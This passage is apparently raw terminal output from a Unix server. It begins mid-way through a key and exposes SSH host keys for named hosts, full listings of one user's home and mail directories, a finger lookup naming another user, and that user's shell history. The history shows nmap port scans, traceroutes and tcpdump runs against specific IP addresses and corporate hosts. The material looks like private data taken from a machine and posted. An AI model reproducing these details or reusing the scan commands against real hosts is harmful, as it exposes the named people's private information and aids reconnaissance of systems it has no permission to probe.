/2RIWGXroqIuwtUTpCgv5EaVl0jLDQOAUzAAAAFQCLrFsMcvBmmTqEjpveYpziCNRYcQAAAIEAy8jVh
k2u7P/40YcWs2ALHADw90S4mID6V8y8JoJchrnv+Lxm2u4no+3rMFe2vCCqyuR0/LyzAwB/83+qR8fD
lz6Z6BWn86E/ln4+yWZEf5RazSQWDQuIxNmoQQhM3FTdMgY0Ygu2/IiC4Ud8Cgi2LBrKo/L+siOVwSS
ZSof1DIMAAACAfuWlhxtuoJ6AVj6QYHb4GT8Ty6dwdkTbQYosOaFe3xVmWRM+I+VtMX5ThgHbpA28WS
bupXNwi9k6cj/uakbnYxTfIkAKWz72C+YV6M61GZ41GctKFrkw4B2L2PtovqQOWOc44de6VbEJPTXg2
JgcRQPpmNvPGsFlq0vUuCEcjGo=
www.doxpara.com ssh-dss
AAAAB3NzaC1kc3MAAACBAMRswnXuWSrx3GKx4BZLu3ECQmH6/NMLPEVEpkA/0kYxkC/qaFFy78pJZrL
UZPiv//agPo0Sy++blLY+RWYy0tUURIMos4OtxaPJpYRVvJt9LUCBnaZteqS1ySz/EQ3RGA68c9eivw
xEj3p2leTgkm0glOYbJgUjYApbanLFVIWNAAAAFQD+79pVXrStiEizoqE2mauMxqrchwAAAIBJw1G93
S0YyoFDazaPh9HWosXnkHHu+rr8JbEs45JmuI6b+2PmuKZMKV74yj4/9IBI1SEQ46eStJRuf5xCI8Su
LxGM2DD+Hq25a52sTZW/vm9l6RrpwodlO+60AUE8AYnVLrwfLeFuGxsUxnnFuzFC8lzxTAfaNuxnYE7
UESbVUgAAAIEAj2o/xnsFEsGZ3N3xvz5BwmX4eSP4Kzrm39Zx8UWdPWE/HnnFgabs+eYQq3Sny41wEd
wTlwsNAnro88Q82w/BeApPvJZo0EluHVT8xAJUQUot2LseWo26q0cuqe7enaqW1e7SzVy26BsmiPI+i
kelDYPPD37PuQpis3TxYEFqJXE=
127.0.0.1 ssh-dss
AAAAB3NzaC1kc3MAAAEBAKC3olePMEjqA5NzNVG8ZoiG9QdFEdZzR44cv1Abz/yb4YRRLDHSDpf5ADx
areqwXEadsSA9mWvEzZzSMv4EAkW2Vk9Rc1Z17HCCuaErQrYze/AxHHj33x13VUt73Kf1M8t40k3inr
0ou94yhgEAYmgQh7iRg/M1+X9tc2rPRkzEhZGjgFyCGAIDhq5SwtGAHILCuyb7hAJAq0iSu7tlz9XLI
J9NDdkbaw+YuxfqZiiZdYJitMGotA+j162TGjq3XGiG7x0rCscF8V9exBfJ7mnDDzvXlG2dTS7H7TBv
fyopkBLtOd14x8hAUJtWmbDWChXXlEQ4x8DjoXtLmME/2Y8AAAAVAMhO8csH950pSRsYRtoAiYRgyiv
FAAABABMLbU/fTFcgeUG7kcBYMD/OQ9gOrR29d7lAXjKVwpgTwQYF+VdznD4x3LDdz/0gvwl0Hs+Kdu
vsaayLhRmJZ0bVg4D717mB8wrb5OvHUuU0afh1XXpVICFF8WdGFtIbuL7H6VCpf4G1D+I4xcl2LAeue
6WbVN5gho0HKKvZikb9EQnVREUsWO9of2ikgE054dOTOlv+C+ic8csnkf8wsjDSZXlU5eTBePwKBnT3
HcKjM2tcjuyMAXazAH4ksXo8toFTAefCjCGJmffTTaX9jGIJKtZXRmqkK/+qngu9My9oOJlFCyW65ex
Ca+02rdWV6Pgd0D2Hk6dVE3qscBUpXLQAAAEBAI+MvvMq5N6C9qRQNvYYmYOqNLTWC9kK8Iae884Lm+
Zyu96S8q8AF/qWa0hUd/9ugB7eD0CbkDBBNPCEE3lAH2onMhNKYgSbGvUOS/BrInbiwkjkvQ8yGMLF6
0fr7DRzTwGWTVoIBDgf9Fn45QSL+3S3FDDDNEoyr6kwDmvVsvCymIAQkfJUaDULt3hdvyZ+EauRGwZM
EQfkpyJQYUuYsP5n9VQcGSxFsGAZLIjsHcAjCUQj1fILkXmMumw8D2efYNeCrF91G5UFL2WOHyVK0YY
71OcoO2fTAMj7qZxaj2PUT7zfz3+OXfuzkwXpsRmcEDEcu/ofC7jxPkdCnrhe3DI=
[kesselrun.com]:2582 ssh-dss
AAAAB3NzaC1kc3MAAACBAPQBgp++G7uf5K6G5uz++lqweRMuTLKV5wKY08k1CXFGU4ewFiRnCceFrcg
Tc7W9c1HjyT4iNZDHCQCVpwp6IrWRoIEgr6e7uPut0uMavhbLsHHELIcQK6Z31z5wKKwmTQBRfTS+JM
W19gqZSN3yo/6ZFsHhuUItfcfYekLoApr1AAAAFQCsMKXv28Lniuq0ktEhu6FA6Miy+wAAAIEAqoGdz
UhTkURwmB6BYNskWHeZUfvJjS+Elojtx7wK4NhXg4T+2XYfe+b4mhSMkSGwCGMyfNHpQPgNgkaeBJgo
62epoJPNq3x3hY3h6AAP/boe9BLnbihQdoOjKfx/Kn6ZhmL3oF16zYy7xHA7WOUJxiGLC7RiUmfO+kU
zNDAkPdsAAACAQLvUqTCx7XYf3enIALFCEl8wo05VKTAdlXRZJYFCTplFyhrS0IrNtF9556UD2jtILY
Z9yarRvhcMF7O60vnvVG5r9iWOoIwvE6zWorr5jNtpr179auvdP2Kuo9NJl84b8qV6t6ZmNDraGRbV1
6SEv6GCgeqJraLgrMWWhmCDwkA=
shaitan1.lightconsulting.com ssh-dss
AAAAB3NzaC1kc3MAAACBAMMrzcx0ezsqHdn3cXWoJPNBnjZTsI4etOxp89TGeeceaaYkBpu0t7eVppr
RUUZd0A5+HnfQtzpllePOKVZOEMT8tyBq2yzRb/5XXgtMbq0XpHdjeUeCDbRfJhfBs93MycUkACGiMQ
kwJyYZzos2+uoMSW+oN7uI3+bZf4aAgbWbAAAAFQCkIvJw58KPEbb4ntpwGrBf/O+qYwAAAIB7HXGF5
P4RkT7Ve5Hynn+eUQR96TkxirUMwfp5GV91mOvLJvX2fMC6SKDhHoKG7P6aGh99hbpiji2WV6bca3vI
gzWPtIEZomssaOlDFcITgjcvoJs42BtyD5iAXpNazs0CdfjZtyoA4dTIsh3BecxyxD4KYzfU3NPjL3q
ZqF7iSAAAAIBRacmRtkoSlyG5hvSNLe6vkNOsjsncCUa05c5pWFBCn338FCf7hP44Qx7/ZtR5Dgu7Vg
PwdHdKUrVItHIbgwTMpQXWq9WbKhGwt82dgov9+NisNvbNiMLPywthNelfD5U37+QnwYx3SMbMTOJ2i
SkiIfvJzQj7BTvSYjo0ePNN7A==
%ls -la
total 7437192
-rw-r--r--   1 effugas  wheel         53 Mar 10  2005 +COMMENT
-rw-r--r--   1 effugas  wheel        490 Mar 10  2005 +CONTENTS
-rw-r--r--   1 effugas  wheel        307 Mar 10  2005 +DESC
-r--r--r--   1 effugas  wheel      13080 Mar 10  2005 +MTREE_DIRS
-rw-r--r--   1 effugas  wheel    1299747 Jul 16  2005 -
-rw-r--r--   1 effugas  wheel          0 Sep 28  2005 -u
drwx------  68 effugas  wheel       5120 Jul 17 11:43 .
drwxr-xr-x  33 root     wheel       1024 Jul 13 14:24 ..
-rw-------   1 effugas  wheel        434 Jan 13  2008 .Xauthority
-rw-r--r--   1 effugas  wheel          0 Oct 24  2006 .addressbook
-rw-------   1 effugas  wheel       2285 Oct 24  2006 .addressbook.lu
-rw-------   1 effugas  wheel      12839 Jul 18 06:18 .bash_history
drwxr-xr-x   7 effugas  wheel        512 Jun 13  2008 .bittorrent
drwxr-xr-x   6 effugas  wheel        512 Feb  6 14:05 .cpan
drwx------   2 effugas  wheel        512 Apr 23  2005 .elinks
drwx------   2 effugas  jb           512 Sep 24  2005 .elm
-rw-r--r--   1 effugas  wheel      63520 Sep 29  2005 .fonts.cache-1
drwx------   4 effugas  wheel        512 Feb 15  2006 .gaim
drwx------   2 effugas  wheel        512 Mar 19 00:41 .gnupg
-rw-------   1 effugas  wheel     302298 Dec 30  2005 .grepmail-cache
-rw-------   1 effugas  wheel         67 Jul  6  2008 .lesshst
-rw-r--r--   1 effugas  wheel        133 Jun 10  2006 .mailboxlist
-rw-------   1 effugas  wheel       7465 Jun  3 06:23 .mysql_history
-rw-------   1 effugas  wheel        221 Sep 10  2004 .nessusrc
-rw-r--r--   1 effugas  wheel      28672 Sep  2  2004 .nomde_ex.pl.swo
-rw-r--r--   1 effugas  wheel      16384 Sep  7  2004 .nomde_ex.pl.swp
drwx------   8 effugas  wheel        512 Dec  5  2005 .openwebmail
-rw-------   1 effugas  wheel       1592 Apr 20 19:28 .pine-interrupted-mail
-rw-------   1 effugas  wheel      17165 Jul 17 11:38 .pinerc
-rw-r--r--   1 effugas  wheel        816 Jan  8  2006 .procmailrc
-rw-------   1 effugas  wheel       1024 Jan  7  2009 .rnd
-rw-r--r--   1 effugas  wheel         12 Apr  4  2005 .slirprc
drwx------   2 effugas  wheel        512 Jul 12 14:02 .spamassassin
drwxr-xr-x   2 effugas  wheel        512 Nov  9  2005 .ssh
drwxr-xr-x   3 effugas  wheel        512 Jun 23  2007 .subversion
-rw-------   1 effugas  jb           256 Dec  5  2005 .vacation.msg
drwxr-xr-x   2 effugas  wheel        512 Sep 29  2005 .vnc
-rw-r--r--   1 effugas  wheel       5714 Sep  5  2007 110eclipse.jpg
-rw-r--r--   1 effugas  wheel       5714 Sep  5  2007 110eclipse.jpg.1
-rw-r--r--   1 effugas  wheel    4170702 Dec 17  2006 17-Day tripper.mp3
-rw-r--r--   1 effugas  wheel      18163 Oct 10  2006 399299
drwx------  11 effugas  wheel       2048 Jan 14  2007 4
-rw-------   1 effugas  wheel    1244999 Jul 25  2005 Admin Noise
-rwx------   1 effugas  wheel      19253 May 20  2007 Alpha Man Conversation & Persuasion.torrent
drwxr-xr-x   7 effugas  wheel        512 Jun 14  2008 BitTorrent Downloads
drwxr-xr-x  11 root     wheel       1024 Jan 13  2007 BitTorrent-4.20.9
-rw-------   1 effugas  wheel    9215553 Aug 12  2006 CCCP
-rw-r--r--   1 effugas  wheel     136192 Aug 12  2007 Cingular_Customized APN info and price sheet.doc
-rw-------   1 effugas  wheel   11072756 Sep 15  2006 Crypto
-rwx------   1 effugas  wheel      18865 Nov  4  2006 David X Seduction and Relationships Seminar.torrent
-rw-r--r--   1 effugas  wheel      64512 Jan  6  2006 DiogeNeS.doc
-rw-r--r--   1 effugas  wheel      27648 May 10 13:01 Doxpara-NDT term sheet.doc
-rw-------   1 effugas  wheel     425406 Jul 25  2005 Drafts
-rw-r--r--   1 effugas  wheel      27648 Aug 12  2007 Encryption sw_SecurStar info.doc
lrwxr-xr-x   1 effugas  wheel         29 Jan  8  2006 Funsec -> /usr/home/effugas/mail/Funsec
-rw-------   1 effugas  mail    10369669 Sep 25  2005 Gap
-rw-------   1 effugas  wheel        496 Sep 30  2005 INBOX.Drafts
-rw-------   1 effugas  wheel     324536 Nov 18  2005 INBOX.Sent
-rw-------   1 effugas  wheel        496 Sep 30  2005 INBOX.Trash
-rwx------   1 effugas  wheel      20767 Oct 24  2006 Juggler - Charisma Arts Bootcamp.avi.torrent
-rw-r--r--   1 effugas  wheel  403486571 Jul 13  2006 Junk
-rw-r--r--   1 effugas  wheel  379402660 Nov 17  2005 Junk_toobig
-rw-------   1 effugas  wheel  280301055 Aug 21  2006 Known
drwxr-xr-x   2 effugas  wheel        512 Sep 26  2005 MT-3.2-en_US
-rwx------   1 effugas  wheel    1377924 Sep 26  2005 MT-3.2.tar.gz
drwxrwxrwx   2 effugas  jb           512 Sep 24  2005 Mail
-rw-r--r--   1 effugas  wheel       1438 Oct  4  2006 Makefile
-rw-------   1 effugas  wheel  229972323 Sep 21  2006 Older Mail
-rw-------   1 effugas  wheel  181797360 Jul 25  2005 Orig_Older
-rw-------   1 effugas  wheel        492 Jul 25  2005 Outbox
-rw-r--r--   1 effugas  wheel     200578 Aug 12  2007 PhoneCrypt_docs_pc.pdf
-rwx------   1 effugas  wheel      28554 Nov 18  2006 PickUp 101 - He Said, She Said - Volume 1.torrent
drwxr-xr-x   2 effugas  wheel        512 Oct  2  2005 PyFlickrUploadr
-rw-r--r--   1 effugas  wheel       7164 Oct  2  2005 PyFlickrUploadr.tar.gz
lrwxr-xr-x   1 effugas  wheel         31 Jan  8  2006 RouteSec -> /usr/home/effugas/mail/RouteSec
-rw-r--r--   1 effugas  wheel    1352443 Mar  1  2008 Secret of Mana.zip
-rw-------   1 effugas  wheel  144765683 Jul 26  2006 Sent
-rw-------   1 effugas  wheel   68609225 Jul 25  2005 Sent Items
-rw-r--r--   1 effugas  wheel          0 Sep 25  2005 Spam
-rw-r--r--   1 effugas  wheel   55823056 Aug 10  2006 Trash
drwxr-xr-x   2 effugas  wheel        512 Oct 28  2005 ack
drwxr-xr-x   2 effugas  wheel       1024 Aug  8  2007 airhook-2
-rw-r--r--   1 effugas  wheel      28282 Apr 14  2003 airhook-2.tar.gz
drwxr-xr-x   2 effugas  wheel        512 Sep  8  2008 ap
drwxr-xr-x   2 effugas  wheel       1536 Feb 21  2008 arse
-rw-r--r--   1 effugas  wheel        614 Jan 19  2005 authorized_keys
-rw-r--r--   1 effugas  wheel       8048 Jan 23  2006 av2.txt
-rw-r--r--   1 effugas  wheel       2641 Oct  6  2006 back.pem
drwxr-xr-x   2 effugas  wheel       1024 Jul 25  2006 bin
-rw-r--r--   1 effugas  wheel       1801 Feb 23  2008 boing_seq.txt
-rwx------   1 effugas  wheel     214576 Jul 25  2006 bplex_0_dev-src.gz
-rw-r--r--   1 effugas  wheel       1662 Sep  8  2008 browserRedirect?url=itms%3A%2F%2Fax.phobos.apple.com.edgesuite.net%2FWebObjects%2FMZStore.woa%2Fwa%2FviewGenre%3Fid%3D35
drwxr-xr-x   2 effugas  wheel        512 Jun 11  2006 ca
drwxr-xr-x   2 effugas  wheel        512 Sep 24  2006 cl
drwxr-xr-x  60 effugas  wheel       4096 Jul  6  2008 content
drwxrwxrwx   2 effugas  wheel        512 Jul  8  2008 db
-rw-r--r--   1 effugas  wheel     963360 Sep 26  2005 db.dump
-rw-------   1 effugas  wheel       2416 Apr 27 13:07 dead.letter
-rw-r--r--   1 effugas  wheel        718 Feb 22  2008 del.txt
-rw-r--r--   1 effugas  wheel       4196 Feb 23  2008 del_seq.txt
-rw-r--r--   1 effugas  wheel       4188 Feb 23  2008 del_ts.txt
-rw-r--r--   1 effugas  wheel      10980 Sep 19  2006 dell_ssl2.txt
-rw-------   1 effugas  wheel     815104 Feb 11  2008 dig.core
drwxr-xr-x   2 effugas  wheel       1024 Jul 30  2006 dissoc-0.1
-rw-r--r--   1 effugas  wheel      51652 Jul  2  2001 dissoc-0.1.tar.gz
-rw-r--r--   1 effugas  wheel        193 Oct  4  2006 distinfo
-rwx------   1 effugas  wheel    7211132 Mar 15  2008 dk2_cli.pcap
drwxr-xr-x  33 effugas  wheel       3584 Jul 13 11:47 dl
-rw-r--r--   1 effugas  wheel       4338 Mar 30  2005 dns.cap
-rw-r--r--   1 effugas  wheel       4338 Apr 13 15:23 dns.pcap
-rwx------   1 effugas  wheel    3793316 Jun 15  2006 domain_login_esp.cap
drwxr-xr-x   2 effugas  wheel        512 Dec 23  2008 dprint
-rw-r--r--   1 effugas  wheel  615112704 Nov  5  2006 en_winxp_pro_with_sp2.iso
-rw-r--r--   1 effugas  wheel       1967 Feb 23  2008 fark_seq.txt
-rw-r--r--   1 effugas  wheel       1984 Feb 23  2008 fark_ts.txt
drwxr-xr-x   2 effugas  wheel        512 Oct  4  2006 files
-rw-------   1 effugas  jb        209744 Sep 25  2005 filtered
-rw-------   1 effugas  wheel   37106364 Sep 26  2005 fire_inbox
-rw-r--r--   1 effugas  wheel    7385211 Oct 28  2005 foo.pgp
-rw-r--r--   1 effugas  wheel   10485784 Jun 19  2006 foo.xml
-rw-r--r--   1 effugas  wheel      12920 Feb 22  2008 g_seq.txt
-rw-r--r--   1 effugas  wheel      12848 Feb 22  2008 g_ts.txt
-rw-------   1 effugas  jb       2909341 Jan 12  2006 gah
drwxr-xr-x   9 effugas  wheel       1536 Aug 11  2005 gaim-1.5.0
-rw-r--r--   1 effugas  wheel    6123237 Aug 11  2005 gaim-1.5.0.tar.bz2
-rw-------   1 effugas  wheel    7999488 Sep 29  2005 gaim.core
-rw-r--r--   1 effugas  wheel       1588 Jan  1  2006 ghet_ip.c
drwxrwxr-x   2 effugas  wheel        512 Sep 30  2005 ghetto
drwxr-xr-x   2 effugas  wheel        512 Sep 25  2005 gml
-rwxr-xr-x   1 effugas  wheel       3395 Jun 17  2004 gml.py
drwxr-xr-x   2 effugas  wheel        512 Aug 23  2007 haxedit
-rwx------   1 effugas  wheel      40960 Aug 27  2007 haxedit.tgz
-rwxr-xr-x   1 effugas  wheel       5312 Apr  6 14:20 heh
-rw-r--r--   1 effugas  wheel        168 Apr  6 14:20 heh.cpp
drwxr-xr-x   2 effugas  wheel        512 Apr 26 00:32 hmm
-rw-r--r--   1 effugas  wheel    1636602 Oct 28  2005 hmm.txt
-rw-r--r--   1 effugas  wheel       2200 Jan 21  2008 hoho.txt
-rw-r--r--   1 effugas  wheel   15748938 Nov 24  2007 huh_shai.gz
drwxr-xr-x   5 effugas  wheel        512 Jan 24  2006 imgSeek-0.8.6
-rw-r--r--   1 effugas  wheel     396056 Nov 14  2006 imgSeek-0.8.6.tar.bz2
-rw-r--r--   1 effugas  wheel     618624 Aug 12  2007 imsi-capture_phonecrypt_secured.wav
-rw-r--r--   1 effugas  wheel      74086 Jun 10  2006 index.php
-rw-r--r--   1 effugas  wheel      36115 Oct  5  2006 index.txt
-rwxr-xr-x   1 effugas  wheel       2739 Nov  7  2005 info_bot.pl
drwxr-xr-x   2 effugas  wheel     133120 Dec  5  2006 is
-rw-r--r--   1 effugas  wheel         43 May 15  2007 isf.gif
-rw-r--r--   1 effugas  wheel         43 May 15  2007 isf.gif.1
-rw-r--r--   1 effugas  wheel         43 May 15  2007 isf.gif.2
-rw-r--r--   1 effugas  wheel         43 May 15  2007 isf.gif.3
-rw-r--r--   1 effugas  wheel     764567 Nov 26  2007 jm.zone
drwxr-xr-x   2 effugas  wheel        512 Oct  8  2007 johnny
-rw-r--r--   1 effugas  wheel          0 Sep  8  2008 known_hosts
drwxr-xr-x   2 effugas  wheel        512 Mar  8  2005 lib
drwxr-xr-x   7 effugas  wheel       1024 Aug 29  2008 libspf2-1.2.5
-rw-r--r--   1 effugas  wheel     517945 Feb 23  2005 libspf2-1.2.5.tar.gz
-rwx------   1 effugas  wheel    3548321 Jan 21  2008 local3.log
-rw-r--r--   1 effugas  wheel     166676 Feb 22  2008 log.bin
-rw-r--r--   1 effugas  wheel   22722620 Dec  8  2005 log.txt
-rw-r--r--   1 effugas  wheel      10763 Mar 29 18:48 login
drwxr-xr-x   3 effugas  wheel       2048 Dec  5  2006 m
-rw-r--r--   1 effugas  wheel        182 Feb 28  2006 mae.txt
drwxr-xr-x   3 effugas  wheel        512 Jul 17 11:39 mail
drwxrwxrwx   2 effugas  jb           512 Dec 31  2005 mail_oh
-rw-r--r--   1 effugas  wheel       2765 Jun  1  2008 mangle.c
-rw-------   1 effugas  jb       7385213 Oct 28  2005 mater.pgp
-rw-r--r--   1 effugas  wheel         66 Oct 28  2005 mater.pgp.2
-rwxr-xr-x   1 effugas  wheel       4961 Apr 14 17:31 mem
-rw-r--r--   1 effugas  wheel        231 Apr 14 17:31 mem.c
-rw-r--r--   1 effugas  wheel       1002 Jul  6  2008 migrate.pl
drwxr-xr-x   2 effugas  wheel        512 Jan  5  2008 mov
drwxr-xr-x   7 effugas  wheel        512 Sep 29  2005 msn
drwxr-xr-x   2 effugas  wheel        512 Sep 29  2005 msn-bot
-rw-r--r--   1 effugas  wheel      16973 Jul 16  2003 msn-bot.zip
drwxr-xr-x   2 effugas  wheel        512 Jan 13  2006 music
drwxr-xr-x   4 effugas  wheel    4163072 Feb  2  2007 mypix
-rw-r--r--   1 effugas  wheel       7096 Feb 22  2008 mys.txt
-rw-r--r--   1 effugas  wheel      11102 Feb 23  2008 mys_seq.txt
-rw-r--r--   1 effugas  wheel       1032 Feb 23  2008 mys_ts.txt
drwxr-xr-x   7 effugas  wheel       1024 Feb 13  2007 netcat-0.7.1
-rwx------   1 effugas  wheel     398872 Feb 13  2007 netcat-0.7.1.tar.gz
drwxr-xr-x   2 effugas  wheel        512 Jun  5  2007 new
-rw-r--r--   1 effugas  wheel          0 Jun 11  2006 newcert.pem
-rw-r--r--   1 effugas  wheel       1180 Jun 11  2006 newreq.cer
-rw-r--r--   1 effugas  wheel       1180 Jun 11  2006 newreq.pem
-rwxr-xr-x   1 effugas  wheel      10371 Nov 15  2006 nomde.pl
drwxr-xr-x   5 effugas  wheel        512 Sep 17  2004 ophcrack_1_0a
-rw-r--r--   1 effugas  wheel    5114862 Sep 17  2004 ophcrack_1_0a.zip
-rw-r--r--   1 effugas  wheel     139283 Jan 10  2006 out.txt
-rw-------   1 effugas  jb        138418 Sep 28  2005 penn
-rw-------   1 root     wheel  999878656 Nov 25  2008 perl5.8.8.core
-rw-------   1 effugas  wheel   91009024 Jan 26 17:29 pine.core
drwxr-xr-x   3 effugas  wheel      58368 Feb  2  2007 pix
drwxr-xr-x   5 effugas  wheel        512 Jan 26  2007 pix2
-rw-r--r--   1 effugas  wheel        554 Oct  4  2006 pkg-descr
-rw-r--r--   1 effugas  wheel        853 Oct  4  2006 pkg-plist
drwxr-xr-x   3 effugas  wheel        512 Jun  5  2007 s4
-rw-r--r--   1 effugas  wheel     378156 Mar 14  2006 scapy.py
drwxr-xr-x   8 effugas  wheel       2560 Oct  8  2006 screen-4.0.2
-rw-r--r--   1 effugas  wheel     840519 Jan 27  2004 screen-4.0.2.tar.gz
drwxr-xr-x   3 effugas  wheel        512 Sep 27  2005 sdba
-rwxr-xr-x   1 effugas  wheel     486449 Jul 12  2006 sequitur_simple.exe
drwxr-xr-x   2 effugas  wheel        512 Feb  6 14:10 shmoo
-rw-r--r--   1 effugas  wheel     387800 Feb 13  2007 socat-1.5.0.0.tar.gz
-rw-r--r--   1 effugas  wheel          0 Dec 30  2005 spam_first
drwxr-xr-x   2 effugas  wheel       2560 Jul 25  2006 src
-rw-r--r--   1 effugas  wheel        144 Sep 27  2005 subcheck.pl
-rw-rw----   1 effugas  mail   148812841 Dec 30  2005 superchunk_1
-rw-rw----   1 effugas  mail     7489304 Dec 31  2005 superchunk_2
drwxr-xr-x   2 effugas  wheel        512 Apr 20 19:32 swap
-rw-r--r--   1 effugas  wheel        117 Jul  6  2008 tcheck.pl
-rw-r--r--   1 effugas  wheel       1025 Feb 22  2008 test.txt
drwxr-xr-x   2 effugas  wheel        512 Apr  3 15:48 tmp
-rw-r--r--   1 root     wheel     221202 Nov 25  2008 tmp1
-rw-r--r--   1 root     wheel     225530 Nov 25  2008 tmp2
drwxr-xr-x   2 effugas  wheel        512 Nov 11  2008 tor-audit
drwxr-xr-x   5 effugas  wheel       1536 Jun 23  2007 trunk
-rwxr-xr-x   1 effugas  wheel       7232 Feb 13  2007 udpfwd
-rw-r--r--   1 effugas  wheel       3431 Feb 13  2007 udpfwd.c
drwxr-xr-x  20 effugas  wheel       1536 Jun 29 10:16 unbound-1.3.0
-rw-r--r--   1 effugas  wheel    4059848 Jun 11 04:00 unbound-latest.tar.gz
-rw-r--r--   1 effugas  wheel         87 May 17  2007 url.txt
drwxr-xr-x   2 effugas  wheel        512 Sep 20  2005 walker-3.8
-rw-r--r--   1 effugas  wheel      18478 Sep 20  2005 walker-3.8.tar.gz
-rwx------   1 effugas  wheel      24256 Jun 18  2006 webdav.txt
-rwx------   1 effugas  wheel      21710 Jun 18  2006 webdav.xml
drwxr-xr-x   2 effugas  wheel        512 Nov  7  2005 wtf
-rw-r--r--   1 effugas  wheel         92 May 30  2007 wtf.pl
drwxr-xr-x   2 effugas  wheel       1024 Jul 28  2006 xray
-rw-r--r--   1 effugas  wheel      12840 Feb 23  2008 yahoo_seq.txt
-rw-r--r--   1 effugas  wheel      13002 Feb 23  2008 yahoo_ts.txt
%ls -la mail
total 4656348
drwxr-xr-x   3 effugas  wheel         512 Jul 17 11:39 .
drwx------  68 effugas  wheel        5120 Jul 17 11:43 ..
drwx------   4 effugas  wheel         512 Oct 27  2006 .imap
-rw-------   1 effugas  wheel           6 Oct  7  2006 .subscriptions
-rw-------   1 effugas  wheel   101091425 May 10 11:00 Funsec
-rw-------   1 effugas  wheel     3758946 Feb 23 11:13 RouteSec
-rw-------   1 effugas  wheel  1297160537 Jul 12 14:02 Spam
-rw-------   1 effugas  wheel    26177660 May  6 14:13 Subject:
-rw-------   1 effugas  wheel   325849488 Jul 26  2008 Trash
-r--------   1 effugas  wheel           0 Nov 15  2006 _PyR,xy1WFB.pmjm.com
-rw-r--r--   1 effugas  wheel       46592 Apr 18  2006 dan.doc
-rw-------   1 effugas  wheel   190010509 Apr 27 14:02 drone
-rw-------   1 effugas  jb          66078 Apr 18  2006 galley.txt
-rw-------   1 effugas  wheel           0 Jan 29  2006 mail-trash
-rw-------   1 effugas  wheel        1884 Dec 31  2005 other
-rw-------   1 effugas  wheel    12310586 Jul 17 11:39 sent-mail
-rw-------   1 effugas  wheel           0 Jan  8  2006 spam-mail
-rw-------   1 effugas  wheel   296699245 Apr 18 02:36 to_first
-rw-------   1 effugas  wheel   129442683 May 10 08:03 to_other
-rw-------   1 effugas  wheel           0 Jan  7  2006 virus-mail
%ls -lah /var/mail/effugas
-rw-rw----  1 effugas  mail   1.4G Jul 17 11:41 /var/mail/effugas
%cd /home%ls -la jb
total 744332
drwxr-xr-x   6 mooseaccess  jb           512 Apr  6  2004 .
drwxr-xr-x  33 root         wheel       1024 Jul 13 14:24 ..
-rw-------   1 root         jb          6109 Sep 29  2006 .bash_history
-rw-r--r--   1 mooseaccess  jb           771 Sep  9  2004 .cshrc
-rw-r--r--   1 mooseaccess  jb           255 Sep  9  2004 .login
-rw-r--r--   1 mooseaccess  jb           165 Sep  9  2004 .login_conf
-rw-------   1 mooseaccess  jb           371 Sep  9  2004 .mail_aliases
-rw-r--r--   1 mooseaccess  jb           331 Sep  9  2004 .mailrc
drwxr-xr-x   8 mooseaccess  jb           512 Apr  6  2004 .openwebmail
-rw-r--r--   1 mooseaccess  jb           801 Sep  9  2004 .profile
-rw-------   1 mooseaccess  jb           276 Sep  9  2004 .rhosts
-rw-------   1 root         jb          1024 Sep 12  2004 .rnd
-rw-r--r--   1 mooseaccess  jb           852 Sep  9  2004 .shrc
drwx------   2 root         jb           512 Sep 10  2006 .ssh
drwxr-xr-x   2 root         jb           512 Nov 27  2004 airhook-2
-rw-r--r--   1 root         jb         28282 Nov 27  2004 airhook-2.tar.gz
drwxr-xr-x   2 mooseaccess  jb           512 Apr  6  2004 mail
-rw-------   1 root         jb        900104 Nov 18  2004 paketto-1.10.tar.gz
-rw-r--r--   1 root         jb           365 Sep 12  2006 test-scan-ddi-for-quoting.gnmap
-rw-r--r--   1 root         jb           390 Sep 12  2006 test-scan-ddi-for-quoting.nmap
-rw-r--r--   1 root         jb          1023 Sep 12  2006 test-scan-ddi-for-quoting.xml
-rw-r--r--   1 jay          jay      1412325 May  9  2005 vpnforjay.tar.gz
-rw-r--r--   1 root         jb     378449920 Sep  6  2006 win2k.iso
%finger jb
Login: jb             			Name: Jay "Ask DanK" Beale
Directory: /home/jb                 	Shell: /sbin/nologin
Last login Mon Jun 29 10:00 (PDT) on ttyp6 from cpe-72-225-172-
No Mail.
No Plan.
%cat jb/.bash_history
ls
cd /tmp
ls
ls -al
ls -al | grep jb
cd
exit
ls
cd /
ls
cd space
ls
cd iso/
ls
pwd
exit
tcpdump dst host 66.92.163.118 
tcpdump -n dst host 66.92.163.118 
tcpdump -n dst host 66.92.163.118 
tcpdump -n dst host 66.92.163.118 
exit
#nmap -P0 -sS  -r --max_rtt_timeout 66.92.163.118 
ping  66.92.163.118
ping  66.92.163.118
nmap -P0 -sS  -r --max_rtt_timeout 110 --min_rtt_timeout 27 --initial_rtt_timeout 55 66.92.163.118 
nmap -P0 -p1-65535   -r --max_rtt_timeout 110 --min_rtt_timeout 27 --initial_rtt_timeout 55 66.92.163.118 
exit
ls
nmap -v
nmap -V
nmap -sS -oA -sV -P0 -p1-65535 -oA nmap-transfer.activision.com transfer.activision.com 
ls
ls
ls
ls
pwd
ls
cd ..
ls
cd /usr/local/
ls
ls bin/
apt-get install scanrand
cd /usr/ports/
ls
find . -name "*scanrand*" -print
find . -name "*paketto*" -print
ls
cd
ls
su - jay
cp paketto-1.10.tar.gz  ~jay/
su  - jay
vi /etc/passwd 
ls
chown jay ~jay/paketto-1.10.tar.gz 
su - jay
cd ~jay/paketto-1.10
make install
dmesg | less
pwd
ls
cd
ls
tail -f nmap-transfer.activision.com.gnmap 
tail -f nmap-transfer.activision.com.xml 
tail -f nmap-transfer.activision.com.xml '

'
'
mv nmap-3.75.tar.bz2 ~jay/ ; chown jay ~jay/nmap*
su - nmap
su - jay
pwd
cd ~jay
cd nmap-3.75
ls
make install
ls
su - jay
nessusd 
ls
nessusd 
ls
cd
ls
nessusd 
traceroute transfer.activison.com
iptables -A OUTPUT -j ACCEPT
ls
ping webtracker4.activision.com
nmap -P0 -p1-65535 -sS -oA nmap-scan-webtracker4.txt  webtracker4.activision.com
nmap -P0 -sS -p 22,21,23 66.77.144.28
traceroute 66.77.144.28
nmap -P0 -sS -p 22,21,23 66.77.144.28
traceroute 66.77.144.28
tcptraceroute
pwd
cd /usr/ports/
find . -name "tcptrace*" -print
cd net/tcptraceroute/
ls
make install
pwd
cd
tcptraceroute 66.77.144.28
tcptraceroute -p 1521 66.77.144.28
tcptraceroute -p 23 66.77.144.28
ls
exit
ls
tail nmap-scan-webtracker4.txt.
tail nmap-scan-webtracker4.txt.nmap 
tail nmap-scan-webtracker4.txt.xml 
cat nmap-scan-webtracker4.txt.xml 
tcpdump src host 66.77.144.43
nmap -P0 -sS -p80 webtracker4.activision.com 
